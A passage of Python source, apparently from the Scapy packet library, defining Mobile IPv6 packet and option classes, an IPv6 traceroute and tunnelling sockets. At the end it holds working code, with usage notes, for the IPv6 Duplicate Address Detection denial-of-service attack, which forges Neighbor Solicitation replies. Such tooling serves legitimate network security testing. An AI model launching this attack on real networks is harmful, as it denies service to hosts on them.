2682    fields_desc = [ByteEnumField("type", 155, icmp6types),
2683                   ByteEnumField("code", 0, rplcodes),
2684                   XShortField("cksum", None)]
2685    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
2686
2687
2688#############################################################################
2689#############################################################################
2690#               Mobile IPv6 (RFC 3775) and Nemo (RFC 3963)                  #
2691#############################################################################
2692#############################################################################
2693
2694# Mobile IPv6 ICMPv6 related classes
2695
2696class ICMPv6HAADRequest(_ICMPv6):
2697    name = 'ICMPv6 Home Agent Address Discovery Request'
2698    fields_desc = [ByteEnumField("type", 144, icmp6types),
2699                   ByteField("code", 0),
2700                   XShortField("cksum", None),
2701                   XShortField("id", None),
2702                   BitEnumField("R", 1, 1, {1: 'MR'}),
2703                   XBitField("res", 0, 15)]
2704
2705    def hashret(self):
2706        return struct.pack("!H", self.id) + self.payload.hashret()
2707
2708
2709class ICMPv6HAADReply(_ICMPv6):
2710    name = 'ICMPv6 Home Agent Address Discovery Reply'
2711    fields_desc = [ByteEnumField("type", 145, icmp6types),
2712                   ByteField("code", 0),
2713                   XShortField("cksum", None),
2714                   XShortField("id", None),
2715                   BitEnumField("R", 1, 1, {1: 'MR'}),
2716                   XBitField("res", 0, 15),
2717                   IP6ListField('addresses', None)]
2718
2719    def hashret(self):
2720        return struct.pack("!H", self.id) + self.payload.hashret()
2721
2722    def answers(self, other):
2723        if not isinstance(other, ICMPv6HAADRequest):
2724            return 0
2725        return self.id == other.id
2726
2727
2728class ICMPv6MPSol(_ICMPv6):
2729    name = 'ICMPv6 Mobile Prefix Solicitation'
2730    fields_desc = [ByteEnumField("type", 146, icmp6types),
2731                   ByteField("code", 0),
2732                   XShortField("cksum", None),
2733                   XShortField("id", None),
2734                   XShortField("res", 0)]
2735
2736    def _hashret(self):
2737        return struct.pack("!H", self.id)
2738
2739
2740class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2741    name = 'ICMPv6 Mobile Prefix Advertisement'
2742    fields_desc = [ByteEnumField("type", 147, icmp6types),
2743                   ByteField("code", 0),
2744                   XShortField("cksum", None),
2745                   XShortField("id", None),
2746                   BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
2747                   XBitField("res", 0, 14)]
2748
2749    def hashret(self):
2750        return struct.pack("!H", self.id)
2751
2752    def answers(self, other):
2753        return isinstance(other, ICMPv6MPSol)
2754
2755# Mobile IPv6 Options classes
2756
2757
2758_mobopttypes = {2: "Binding Refresh Advice",
2759                3: "Alternate Care-of Address",
2760                4: "Nonce Indices",
2761                5: "Binding Authorization Data",
2762                6: "Mobile Network Prefix (RFC3963)",
2763                7: "Link-Layer Address (RFC4068)",
2764                8: "Mobile Node Identifier (RFC4283)",
2765                9: "Mobility Message Authentication (RFC4285)",
2766                10: "Replay Protection (RFC4285)",
2767                11: "CGA Parameters Request (RFC4866)",
2768                12: "CGA Parameters (RFC4866)",
2769                13: "Signature (RFC4866)",
2770                14: "Home Keygen Token (RFC4866)",
2771                15: "Care-of Test Init (RFC4866)",
2772                16: "Care-of Test (RFC4866)"}
2773
2774
2775class _MIP6OptAlign(Packet):
2776    """ Mobile IPv6 options have alignment requirements of the form x*n+y.
2777    This class is inherited by all MIPv6 options to help in computing the
2778    required Padding for that option, i.e. the need for a Pad1 or PadN
2779    option before it. They only need to provide x and y as class
2780    parameters. (x=0 and y=0 are used when no alignment is required)"""
2781
2782    __slots__ = ["x", "y"]
2783
2784    def alignment_delta(self, curpos):
2785        x = self.x
2786        y = self.y
2787        if x == 0 and y == 0:
2788            return 0
2789        delta = x * ((curpos - y + x - 1) // x) + y - curpos
2790        return delta
2791
2792    def extract_padding(self, p):
2793        return b"", p
2794
2795
2796class MIP6OptBRAdvice(_MIP6OptAlign):
2797    name = 'Mobile IPv6 Option - Binding Refresh Advice'
2798    fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
2799                   ByteField('olen', 2),
2800                   ShortField('rinter', 0)]
2801    x = 2
2802    y = 0  # alignment requirement: 2n
2803
2804
2805class MIP6OptAltCoA(_MIP6OptAlign):
2806    name = 'MIPv6 Option - Alternate Care-of Address'
2807    fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
2808                   ByteField('olen', 16),
2809                   IP6Field("acoa", "::")]
2810    x = 8
2811    y = 6  # alignment requirement: 8n+6
2812
2813
2814class MIP6OptNonceIndices(_MIP6OptAlign):
2815    name = 'MIPv6 Option - Nonce Indices'
2816    fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
2817                   ByteField('olen', 16),
2818                   ShortField('hni', 0),
2819                   ShortField('coni', 0)]
2820    x = 2
2821    y = 0  # alignment requirement: 2n
2822
2823
2824class MIP6OptBindingAuthData(_MIP6OptAlign):
2825    name = 'MIPv6 Option - Binding Authorization Data'
2826    fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
2827                   ByteField('olen', 16),
2828                   BitField('authenticator', 0, 96)]
2829    x = 8
2830    y = 2  # alignment requirement: 8n+2
2831
2832
2833class MIP6OptMobNetPrefix(_MIP6OptAlign):  # NEMO - RFC 3963
2834    name = 'NEMO Option - Mobile Network Prefix'
2835    fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
2836                   ByteField("olen", 18),
2837                   ByteField("reserved", 0),
2838                   ByteField("plen", 64),
2839                   IP6Field("prefix", "::")]
2840    x = 8
2841    y = 4  # alignment requirement: 8n+4
2842
2843
2844class MIP6OptLLAddr(_MIP6OptAlign):  # Sect 6.4.4 of RFC 4068
2845    name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
2846    fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
2847                   ByteField("olen", 7),
2848                   ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
2849                   ByteField("pad", 0),
2850                   MACField("lla", ETHER_ANY)]  # Only support ethernet
2851    x = 0
2852    y = 0  # alignment requirement: none
2853
2854
2855class MIP6OptMNID(_MIP6OptAlign):  # RFC 4283
2856    name = "MIPv6 Option - Mobile Node Identifier"
2857    fields_desc = [ByteEnumField("otype", 8, _mobopttypes),
2858                   FieldLenField("olen", None, length_of="id", fmt="B",
2859                                 adjust=lambda pkt, x: x + 1),
2860                   ByteEnumField("subtype", 1, {1: "NAI"}),
2861                   StrLenField("id", "",
2862                               length_from=lambda pkt: pkt.olen - 1)]
2863    x = 0
2864    y = 0  # alignment requirement: none
2865
2866# We only support decoding and basic build. Automatic HMAC computation is
2867# too much work for our current needs. It is left to the user (I mean ...
2868# you). --arno
2869
2870
2871class MIP6OptMsgAuth(_MIP6OptAlign):  # RFC 4285 (Sect. 5)
2872    name = "MIPv6 Option - Mobility Message Authentication"
2873    fields_desc = [ByteEnumField("otype", 9, _mobopttypes),
2874                   FieldLenField("olen", None, length_of="authdata", fmt="B",
2875                                 adjust=lambda pkt, x: x + 5),
2876                   ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",  # noqa: E501
2877                                                2: "MN-AAA authentication mobility option"}),  # noqa: E501
2878                   IntField("mspi", None),
2879                   StrLenField("authdata", "A" * 12,
2880                               length_from=lambda pkt: pkt.olen - 5)]
2881    x = 4
2882    y = 1  # alignment requirement: 4n+1
2883
2884# Extracted from RFC 1305 (NTP) :
2885# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
2886# in seconds relative to 0h on 1 January 1900. The integer part is in the
2887# first 32 bits and the fraction part in the last 32 bits.
2888
2889
2890class NTPTimestampField(LongField):
2891    def i2repr(self, pkt, x):
2892        if x < ((50 * 31536000) << 32):
2893            return "Some date a few decades ago (%d)" % x
2894
2895        # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
2896        # January 1st 1970 :
2897        delta = -2209075761
2898        i = int(x >> 32)
2899        j = float(x & 0xffffffff) * 2.0**-32
2900        res = i + j + delta
2901        t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
2902
2903        return "%s (%d)" % (t, x)
2904
2905
2906class MIP6OptReplayProtection(_MIP6OptAlign):  # RFC 4285 (Sect. 6)
2907    name = "MIPv6 option - Replay Protection"
2908    fields_desc = [ByteEnumField("otype", 10, _mobopttypes),
2909                   ByteField("olen", 8),
2910                   NTPTimestampField("timestamp", 0)]
2911    x = 8
2912    y = 2  # alignment requirement: 8n+2
2913
2914
2915class MIP6OptCGAParamsReq(_MIP6OptAlign):  # RFC 4866 (Sect. 5.6)
2916    name = "MIPv6 option - CGA Parameters Request"
2917    fields_desc = [ByteEnumField("otype", 11, _mobopttypes),
2918                   ByteField("olen", 0)]
2919    x = 0
2920    y = 0  # alignment requirement: none
2921
2922# XXX TODO: deal with CGA param fragmentation and build of defragmented
2923# XXX       version. Passing of a big CGAParam structure should be
2924# XXX       simplified. Make it hold packets, by the way  --arno
2925
2926
2927class MIP6OptCGAParams(_MIP6OptAlign):  # RFC 4866 (Sect. 5.1)
2928    name = "MIPv6 option - CGA Parameters"
2929    fields_desc = [ByteEnumField("otype", 12, _mobopttypes),
2930                   FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
2931                   StrLenField("cgaparams", "",
2932                               length_from=lambda pkt: pkt.olen)]
2933    x = 0
2934    y = 0  # alignment requirement: none
2935
2936
2937class MIP6OptSignature(_MIP6OptAlign):  # RFC 4866 (Sect. 5.2)
2938    name = "MIPv6 option - Signature"
2939    fields_desc = [ByteEnumField("otype", 13, _mobopttypes),
2940                   FieldLenField("olen", None, length_of="sig", fmt="B"),
2941                   StrLenField("sig", "",
2942                               length_from=lambda pkt: pkt.olen)]
2943    x = 0
2944    y = 0  # alignment requirement: none
2945
2946
2947class MIP6OptHomeKeygenToken(_MIP6OptAlign):  # RFC 4866 (Sect. 5.3)
2948    name = "MIPv6 option - Home Keygen Token"
2949    fields_desc = [ByteEnumField("otype", 14, _mobopttypes),
2950                   FieldLenField("olen", None, length_of="hkt", fmt="B"),
2951                   StrLenField("hkt", "",
2952                               length_from=lambda pkt: pkt.olen)]
2953    x = 0
2954    y = 0  # alignment requirement: none
2955
2956
2957class MIP6OptCareOfTestInit(_MIP6OptAlign):  # RFC 4866 (Sect. 5.4)
2958    name = "MIPv6 option - Care-of Test Init"
2959    fields_desc = [ByteEnumField("otype", 15, _mobopttypes),
2960                   ByteField("olen", 0)]
2961    x = 0
2962    y = 0  # alignment requirement: none
2963
2964
2965class MIP6OptCareOfTest(_MIP6OptAlign):  # RFC 4866 (Sect. 5.5)
2966    name = "MIPv6 option - Care-of Test"
2967    fields_desc = [ByteEnumField("otype", 16, _mobopttypes),
2968                   FieldLenField("olen", None, length_of="cokt", fmt="B"),
2969                   StrLenField("cokt", b'\x00' * 8,
2970                               length_from=lambda pkt: pkt.olen)]
2971    x = 0
2972    y = 0  # alignment requirement: none
2973
2974
2975class MIP6OptUnknown(_MIP6OptAlign):
2976    name = 'Scapy6 - Unknown Mobility Option'
2977    fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
2978                   FieldLenField("olen", None, length_of="odata", fmt="B"),
2979                   StrLenField("odata", "",
2980                               length_from=lambda pkt: pkt.olen)]
2981    x = 0
2982    y = 0  # alignment requirement: none
2983
2984    @classmethod
2985    def dispatch_hook(cls, _pkt=None, *_, **kargs):
2986        if _pkt:
2987            o = orb(_pkt[0])  # Option type
2988            if o in moboptcls:
2989                return moboptcls[o]
2990        return cls
2991
2992
2993moboptcls = {0: Pad1,
2994             1: PadN,
2995             2: MIP6OptBRAdvice,
2996             3: MIP6OptAltCoA,
2997             4: MIP6OptNonceIndices,
2998             5: MIP6OptBindingAuthData,
2999             6: MIP6OptMobNetPrefix,
3000             7: MIP6OptLLAddr,
3001             8: MIP6OptMNID,
3002             9: MIP6OptMsgAuth,
3003             10: MIP6OptReplayProtection,
3004             11: MIP6OptCGAParamsReq,
3005             12: MIP6OptCGAParams,
3006             13: MIP6OptSignature,
3007             14: MIP6OptHomeKeygenToken,
3008             15: MIP6OptCareOfTestInit,
3009             16: MIP6OptCareOfTest}
3010
3011
3012# Main Mobile IPv6 Classes
3013
3014mhtypes = {0: 'BRR',
3015           1: 'HoTI',
3016           2: 'CoTI',
3017           3: 'HoT',
3018           4: 'CoT',
3019           5: 'BU',
3020           6: 'BA',
3021           7: 'BE',
3022           8: 'Fast BU',
3023           9: 'Fast BA',
3024           10: 'Fast NA'}
3025
3026# From http://www.iana.org/assignments/mobility-parameters
3027bastatus = {0: 'Binding Update accepted',
3028               1: 'Accepted but prefix discovery necessary',
3029            128: 'Reason unspecified',
3030            129: 'Administratively prohibited',
3031            130: 'Insufficient resources',
3032            131: 'Home registration not supported',
3033            132: 'Not home subnet',
3034            133: 'Not home agent for this mobile node',
3035            134: 'Duplicate Address Detection failed',
3036            135: 'Sequence number out of window',
3037            136: 'Expired home nonce index',
3038            137: 'Expired care-of nonce index',
3039            138: 'Expired nonces',
3040            139: 'Registration type change disallowed',
3041            140: 'Mobile Router Operation not permitted',
3042            141: 'Invalid Prefix',
3043            142: 'Not Authorized for Prefix',
3044            143: 'Forwarding Setup failed (prefixes missing)',
3045            144: 'MIPV6-ID-MISMATCH',
3046            145: 'MIPV6-MESG-ID-REQD',
3047            146: 'MIPV6-AUTH-FAIL',
3048            147: 'Permanent home keygen token unavailable',
3049            148: 'CGA and signature verification failed',
3050            149: 'Permanent home keygen token exists',
3051            150: 'Non-null home nonce index expected'}
3052
3053
3054class _MobilityHeader(Packet):
3055    name = 'Dummy IPv6 Mobility Header'
3056    overload_fields = {IPv6: {"nh": 135}}
3057
3058    def post_build(self, p, pay):
3059        p += pay
3060        tmp_len = self.len
3061        if self.len is None:
3062            tmp_len = (len(p) - 8) // 8
3063        p = p[:1] + struct.pack("B", tmp_len) + p[2:]
3064        if self.cksum is None:
3065            cksum = in6_chksum(135, self.underlayer, p)
3066        else:
3067            cksum = self.cksum
3068        p = p[:4] + struct.pack("!H", cksum) + p[6:]
3069        return p
3070
3071
3072class MIP6MH_Generic(_MobilityHeader):  # Mainly for decoding of unknown msg
3073    name = "IPv6 Mobility Header - Generic Message"
3074    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3075                   ByteField("len", None),
3076                   ByteEnumField("mhtype", None, mhtypes),
3077                   ByteField("res", None),
3078                   XShortField("cksum", None),
3079                   StrLenField("msg", b"\x00" * 2,
3080                               length_from=lambda pkt: 8 * pkt.len - 6)]
3081
3082
3083class MIP6MH_BRR(_MobilityHeader):
3084    name = "IPv6 Mobility Header - Binding Refresh Request"
3085    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3086                   ByteField("len", None),
3087                   ByteEnumField("mhtype", 0, mhtypes),
3088                   ByteField("res", None),
3089                   XShortField("cksum", None),
3090                   ShortField("res2", None),
3091                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
3092                   _OptionsField("options", [], MIP6OptUnknown, 8,
3093                                 length_from=lambda pkt: 8 * pkt.len)]
3094    overload_fields = {IPv6: {"nh": 135}}
3095
3096    def hashret(self):
3097        # Hack: BRR, BU and BA have the same hashret that returns the same
3098        #       value b"\x00\x08\x09" (concatenation of mhtypes). This is
3099        #       because we need match BA with BU and BU with BRR. --arno
3100        return b"\x00\x08\x09"
3101
3102
3103class MIP6MH_HoTI(_MobilityHeader):
3104    name = "IPv6 Mobility Header - Home Test Init"
3105    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3106                   ByteField("len", None),
3107                   ByteEnumField("mhtype", 1, mhtypes),
3108                   ByteField("res", None),
3109                   XShortField("cksum", None),
3110                   StrFixedLenField("reserved", b"\x00" * 2, 2),
3111                   StrFixedLenField("cookie", b"\x00" * 8, 8),
3112                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
3113                   _OptionsField("options", [], MIP6OptUnknown, 16,
3114                                 length_from=lambda pkt: 8 * (pkt.len - 1))]
3115    overload_fields = {IPv6: {"nh": 135}}
3116
3117    def hashret(self):
3118        return bytes_encode(self.cookie)
3119
3120
3121class MIP6MH_CoTI(MIP6MH_HoTI):
3122    name = "IPv6 Mobility Header - Care-of Test Init"
3123    mhtype = 2
3124
3125    def hashret(self):
3126        return bytes_encode(self.cookie)
3127
3128
3129class MIP6MH_HoT(_MobilityHeader):
3130    name = "IPv6 Mobility Header - Home Test"
3131    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3132                   ByteField("len", None),
3133                   ByteEnumField("mhtype", 3, mhtypes),
3134                   ByteField("res", None),
3135                   XShortField("cksum", None),
3136                   ShortField("index", None),
3137                   StrFixedLenField("cookie", b"\x00" * 8, 8),
3138                   StrFixedLenField("token", b"\x00" * 8, 8),
3139                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
3140                   _OptionsField("options", [], MIP6OptUnknown, 24,
3141                                 length_from=lambda pkt: 8 * (pkt.len - 2))]
3142    overload_fields = {IPv6: {"nh": 135}}
3143
3144    def hashret(self):
3145        return bytes_encode(self.cookie)
3146
3147    def answers(self, other):
3148        if (isinstance(other, MIP6MH_HoTI) and
3149                self.cookie == other.cookie):
3150            return 1
3151        return 0
3152
3153
3154class MIP6MH_CoT(MIP6MH_HoT):
3155    name = "IPv6 Mobility Header - Care-of Test"
3156    mhtype = 4
3157
3158    def hashret(self):
3159        return bytes_encode(self.cookie)
3160
3161    def answers(self, other):
3162        if (isinstance(other, MIP6MH_CoTI) and
3163                self.cookie == other.cookie):
3164            return 1
3165        return 0
3166
3167
3168class LifetimeField(ShortField):
3169    def i2repr(self, pkt, x):
3170        return "%d sec" % (4 * x)
3171
3172
3173class MIP6MH_BU(_MobilityHeader):
3174    name = "IPv6 Mobility Header - Binding Update"
3175    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3176                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
3177                   ByteEnumField("mhtype", 5, mhtypes),
3178                   ByteField("res", None),
3179                   XShortField("cksum", None),
3180                   XShortField("seq", None),  # TODO: ShortNonceField
3181                   FlagsField("flags", "KHA", 7, "PRMKLHA"),
3182                   XBitField("reserved", 0, 9),
3183                   LifetimeField("mhtime", 3),  # unit == 4 seconds
3184                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
3185                   _OptionsField("options", [], MIP6OptUnknown, 12,
3186                                 length_from=lambda pkt: 8 * pkt.len - 4)]
3187    overload_fields = {IPv6: {"nh": 135}}
3188
3189    def hashret(self):  # Hack: see comment in MIP6MH_BRR.hashret()
3190        return b"\x00\x08\x09"
3191
3192    def answers(self, other):
3193        if isinstance(other, MIP6MH_BRR):
3194            return 1
3195        return 0
3196
3197
3198class MIP6MH_BA(_MobilityHeader):
3199    name = "IPv6 Mobility Header - Binding ACK"
3200    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3201                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
3202                   ByteEnumField("mhtype", 6, mhtypes),
3203                   ByteField("res", None),
3204                   XShortField("cksum", None),
3205                   ByteEnumField("status", 0, bastatus),
3206                   FlagsField("flags", "K", 3, "PRK"),
3207                   XBitField("res2", None, 5),
3208                   XShortField("seq", None),  # TODO: ShortNonceField
3209                   XShortField("mhtime", 0),  # unit == 4 seconds
3210                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
3211                   _OptionsField("options", [], MIP6OptUnknown, 12,
3212                                 length_from=lambda pkt: 8 * pkt.len - 4)]
3213    overload_fields = {IPv6: {"nh": 135}}
3214
3215    def hashret(self):  # Hack: see comment in MIP6MH_BRR.hashret()
3216        return b"\x00\x08\x09"
3217
3218    def answers(self, other):
3219        if (isinstance(other, MIP6MH_BU) and
3220            other.mhtype == 5 and
3221            self.mhtype == 6 and
3222            other.flags & 0x1 and  # Ack request flags is set
3223                self.seq == other.seq):
3224            return 1
3225        return 0
3226
3227
3228_bestatus = {1: 'Unknown binding for Home Address destination option',
3229             2: 'Unrecognized MH Type value'}
3230
3231# TODO: match Binding Error to its stimulus
3232
3233
3234class MIP6MH_BE(_MobilityHeader):
3235    name = "IPv6 Mobility Header - Binding Error"
3236    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3237                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
3238                   ByteEnumField("mhtype", 7, mhtypes),
3239                   ByteField("res", 0),
3240                   XShortField("cksum", None),
3241                   ByteEnumField("status", 0, _bestatus),
3242                   ByteField("reserved", 0),
3243                   IP6Field("ha", "::"),
3244                   _OptionsField("options", [], MIP6OptUnknown, 24,
3245                                 length_from=lambda pkt: 8 * (pkt.len - 2))]
3246    overload_fields = {IPv6: {"nh": 135}}
3247
3248
3249_mip6_mhtype2cls = {0: MIP6MH_BRR,
3250                    1: MIP6MH_HoTI,
3251                    2: MIP6MH_CoTI,
3252                    3: MIP6MH_HoT,
3253                    4: MIP6MH_CoT,
3254                    5: MIP6MH_BU,
3255                    6: MIP6MH_BA,
3256                    7: MIP6MH_BE}
3257
3258
3259#############################################################################
3260#############################################################################
3261#                               Traceroute6                                 #
3262#############################################################################
3263#############################################################################
3264
3265class AS_resolver6(AS_resolver_riswhois):
3266    def _resolve_one(self, ip):
3267        """
3268        overloaded version to provide a Whois resolution on the
3269        embedded IPv4 address if the address is 6to4 or Teredo.
3270        Otherwise, the native IPv6 address is passed.
3271        """
3272
3273        if in6_isaddr6to4(ip):  # for 6to4, use embedded @
3274            tmp = inet_pton(socket.AF_INET6, ip)
3275            addr = inet_ntop(socket.AF_INET, tmp[2:6])
3276        elif in6_isaddrTeredo(ip):  # for Teredo, use mapped address
3277            addr = teredoAddrExtractInfo(ip)[2]
3278        else:
3279            addr = ip
3280
3281        _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
3282
3283        if asn.startswith("AS"):
3284            try:
3285                asn = int(asn[2:])
3286            except ValueError:
3287                pass
3288
3289        return ip, asn, desc
3290
3291
3292class TracerouteResult6(TracerouteResult):
3293    __slots__ = []
3294
3295    def show(self):
3296        return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"),  # TODO: ICMPv6 !  # noqa: E501
3297                                             s.hlim,
3298                                             r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" +  # noqa: E501
3299                                                       "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" +  # noqa: E501
3300                                                       "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" +  # noqa: E501
3301                                                       "{ICMPv6EchoReply:%ir,type%}")))  # noqa: E501
3302
3303    def get_trace(self):
3304        trace = {}
3305
3306        for s, r in self.res:
3307            if IPv6 not in s:
3308                continue
3309            d = s[IPv6].dst
3310            if d not in trace:
3311                trace[d] = {}
3312
3313            t = not (ICMPv6TimeExceeded in r or
3314                     ICMPv6DestUnreach in r or
3315                     ICMPv6PacketTooBig in r or
3316                     ICMPv6ParamProblem in r)
3317
3318            trace[d][s[IPv6].hlim] = r[IPv6].src, t
3319
3320        for k in six.itervalues(trace):
3321            try:
3322                m = min(x for x, y in six.iteritems(k) if y[1])
3323            except ValueError:
3324                continue
3325            for li in list(k):  # use list(): k is modified in the loop
3326                if li > m:
3327                    del k[li]
3328
3329        return trace
3330
3331    def graph(self, ASres=AS_resolver6(), **kargs):
3332        TracerouteResult.graph(self, ASres=ASres, **kargs)
3333
3334
3335@conf.commands.register
3336def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
3337                l4=None, timeout=2, verbose=None, **kargs):
3338    """Instant TCP traceroute using IPv6
3339    traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
3340    """
3341    if verbose is None:
3342        verbose = conf.verb
3343
3344    if l4 is None:
3345        a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport),  # noqa: E501
3346                  timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs)  # noqa: E501
3347    else:
3348        a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4,
3349                  timeout=timeout, verbose=verbose, **kargs)
3350
3351    a = TracerouteResult6(a.res)
3352
3353    if verbose:
3354        a.display()
3355
3356    return a, b
3357
3358#############################################################################
3359#############################################################################
3360#                                  Sockets                                  #
3361#############################################################################
3362#############################################################################
3363
3364
3365class L3RawSocket6(L3RawSocket):
3366    def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):  # noqa: E501
3367        L3RawSocket.__init__(self, type, filter, iface, promisc)
3368        # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)  # noqa: E501
3369        self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)  # noqa: E501
3370        self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))  # noqa: E501
3371
3372
3373def IPv6inIP(dst='203.178.135.36', src=None):
3374    _IPv6inIP.dst = dst
3375    _IPv6inIP.src = src
3376    if not conf.L3socket == _IPv6inIP:
3377        _IPv6inIP.cls = conf.L3socket
3378    else:
3379        del(conf.L3socket)
3380    return _IPv6inIP
3381
3382
3383class _IPv6inIP(SuperSocket):
3384    dst = '127.0.0.1'
3385    src = None
3386    cls = None
3387
3388    def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):  # noqa: E501
3389        SuperSocket.__init__(self, family, type, proto)
3390        self.worker = self.cls(**args)
3391
3392    def set(self, dst, src=None):
3393        _IPv6inIP.src = src
3394        _IPv6inIP.dst = dst
3395
3396    def nonblock_recv(self):
3397        p = self.worker.nonblock_recv()
3398        return self._recv(p)
3399
3400    def recv(self, x):
3401        p = self.worker.recv(x)
3402        return self._recv(p, x)
3403
3404    def _recv(self, p, x=MTU):
3405        if p is None:
3406            return p
3407        elif isinstance(p, IP):
3408            # TODO: verify checksum
3409            if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
3410                if isinstance(p.payload, IPv6):
3411                    return p.payload
3412        return p
3413
3414    def send(self, x):
3415        return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x)  # noqa: E501
3416
3417
3418#############################################################################
3419#############################################################################
3420#                    Neighbor Discovery Protocol Attacks                    #
3421#############################################################################
3422#############################################################################
3423
3424def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
3425                        tgt_filter=None, reply_mac=None):
3426    """
3427    Internal generic helper accepting a specific callback as first argument,
3428    for NS or NA reply. See the two specific functions below.
3429    """
3430
3431    def is_request(req, mac_src_filter, tgt_filter):
3432        """
3433        Check if packet req is a request
3434        """
3435
3436        # Those simple checks are based on Section 5.4.2 of RFC 4862
3437        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3438            return 0
3439
3440        # Get and compare the MAC address
3441        mac_src = req[Ether].src
3442        if mac_src_filter and mac_src != mac_src_filter:
3443            return 0
3444
3445        # Source must be the unspecified address
3446        if req[IPv6].src != "::":
3447            return 0
3448
3449        # Check destination is the link-local solicited-node multicast
3450        # address associated with target address in received NS
3451        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3452        if tgt_filter and tgt != tgt_filter:
3453            return 0
3454        received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
3455        expected_snma = in6_getnsma(tgt)
3456        if received_snma != expected_snma:
3457            return 0
3458
3459        return 1
3460
3461    if not iface:
3462        iface = conf.iface
3463
3464    # To prevent sniffing our own traffic
3465    if not reply_mac:
3466        reply_mac = get_if_hwaddr(iface)
3467    sniff_filter = "icmp6 and not ether src %s" % reply_mac
3468
3469    sniff(store=0,
3470          filter=sniff_filter,
3471          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3472          prn=lambda x: reply_callback(x, reply_mac, iface),
3473          iface=iface)
3474
3475
3476def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
3477                              reply_mac=None):
3478    """
3479    Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3480    3756. This is done by listening incoming NS messages sent from the
3481    unspecified address and sending a NS reply for the target address,
3482    leading the peer to believe that another node is also performing DAD
3483    for that address.
3484
3485    By default, the fake NS sent to create the DoS uses:
3486     - as target address the target address found in received NS.
3487     - as IPv6 source address: the unspecified address (::).
3488     - as IPv6 destination address: the link-local solicited-node multicast
3489       address derived from the target address in received NS.
3490     - the mac address of the interface as source (or reply_mac, see below).
3491     - the multicast mac address derived from the solicited node multicast
3492       address used as IPv6 destination address.
3493
3494    Following arguments can be used to change the behavior:
3495
3496    iface: a specific interface (e.g. "eth0") of the system on which the
3497         DoS should be launched. If None is provided conf.iface is used.
3498
3499    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3500         Only NS messages received from this source will trigger replies.
3501         This allows limiting the effects of the DoS to a single target by
3502         filtering on its mac address. The default value is None: the DoS
3503         is not limited to a specific mac address.
3504
3505    tgt_filter: Same as previous but for a specific target IPv6 address for
3506         received NS. If the target address in the NS message (not the IPv6
3507         destination address) matches that address, then a fake reply will
3508         be sent, i.e. the emitter will be a target of the DoS.
3509
3510    reply_mac: allow specifying a specific source mac address for the reply,
3511         i.e. to prevent the use of the mac address of the interface.
3512    """
3513
3514    def ns_reply_callback(req, reply_mac, iface):
3515        """
3516        Callback that reply to a NS by sending a similar NS
3517        """
3518
3519        # Let's build a reply and send it
3520        mac = req[Ether].src
3521        dst = req[IPv6].dst
3522        tgt = req[ICMPv6ND_NS].tgt
3523        rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt)  # noqa: E501
3524        sendp(rep, iface=iface, verbose=0)
3525
